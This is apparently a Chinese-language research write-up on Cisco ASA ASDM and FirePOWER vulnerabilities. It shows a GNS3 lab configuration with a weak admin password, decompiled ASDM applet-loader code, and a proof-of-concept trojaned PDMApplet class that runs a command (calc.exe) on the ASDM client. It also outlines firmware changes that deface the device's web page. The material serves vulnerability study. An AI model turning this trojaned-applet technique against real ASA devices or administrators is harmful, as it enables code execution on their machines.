Cisco ASA ASDM FirePOWER Services漏洞分析
2.1 CVE-2022-20829
2.2 CVE-2021-1585
2.3 CVE-2022-20828
下载地址:
3.1 GNS3 如何添加Cisco ASA镜像
3.2 Cisco ASA设备配置
ciscoasa>en
ciscoasa#conf t
ciscoasa(config)#int g0/0
ciscoasa(config)#int g 0/0
ciscoasa(config)#ip address dhcp
ciscoasa(config)#nameif inside
ciscoasa(config)#no shut
ciscoasa(config)#exit
ciscoasa(config)#username root password 12345 privilege 15
ciscoasa(config)#http server en
ciscoasa(config)#http 0 0 inside
ciscoasa(config)#show interface ip brief
ciscoasa(config)#write3.3 Cisco ASA设备安装FirePOWER模块
4.1 CVE-2021-1585
try {
clazz = jPClassLoader.loadClass(lop._dynapplet);
} catch (Exception exception) {
System.out.println("Loader: unable to load dynapplet " + Str.quoted(lop._dynapplet));
return null;
}
final SgzApplet ia = (SgzApplet)clazz.newInstance();
sgzApplet._sgzTarget = lop._sgzTarget;
_InnerAppletMap.put(lop._sgzTarget, sgzApplet);
(new Thread("SGZ Loader: launchSgzApplet") {
public void run() {
ia.init();
ia.start(lop._args);//调用class中start方法
}
}).start();
return sgzApplet;
public void run() {
while (!_ShuttingDown) {
try {
LoaderOp loaderOp = dequeue();
if (loaderOp != null)
_MainLoader.launchSgzApplet(loaderOp);
} catch (Exception exception) {
exception.printStackTrace();
}
}
}
Vector _loaderActionQueue = new Vector();
private final synchronized LoaderOp dequeue() {
while (true) {
if (_ShuttingDown)
return null;
if (this._loaderActionQueue.size() > 0) {
LoaderOp loaderOp = this._loaderActionQueue.elementAt(0);//获取第一个元素
this._loaderActionQueue.removeElementAt(0);
if (loaderOp != null)
return loaderOp;
}
try {
wait();
} catch (InterruptedException interruptedException) {}
}
}
//查看变量变化
private final synchronized void enqueue(LoaderOp paramLoaderOp) {
this._loaderActionQueue.addElement(paramLoaderOp);
notifyAll();
}
private final String launchSgzApplet(String[] paramArrayOfString) {
LoaderOp loaderOp = new LoaderOp();
loaderOp._dynarchives = getParameter("dynarchives");
loaderOp._sgzTarget = getParameter("sgzTarget");
loaderOp._dynapplet = getParameter("dynapplet");
if (loaderOp._dynarchives == null) {
loaderOp._dynarchives = Str.getArg(paramArrayOfString, "dynArchives");
loaderOp._sgzTarget = Str.getArg(paramArrayOfString, "sgzTarget");
loaderOp._dynapplet = Str.getArg(paramArrayOfString, "dynApplet");
}
loaderOp._args = paramArrayOfString;
_MainLoader.enqueue(loaderOp);
return "enqueued";
}
....
package com.cisco.pdm;
import java.io.*;
import java.util.*;
import com.cisco.nm.dice.loader.SgzApplet;
public final class PDMApplet extends SgzApplet {
private static PDMApplet b;
public void init() {
}
public void start(String[] paramArrayOfString) {
try
{
Runtime.getRuntime().exec("cmd.exe /c calc.exe");
}
catch (Exception e)
{
}
}
}
4.2 CVE-2022-20829
升级包格式
修改网站首页内容(修改标题为Hack By Neuron)
修改固件一连接ASA设备弹出计算器
4.3 CVE-2022-20828
Reference
Black Hat: Do Not Trust the ASA, Trojans! v3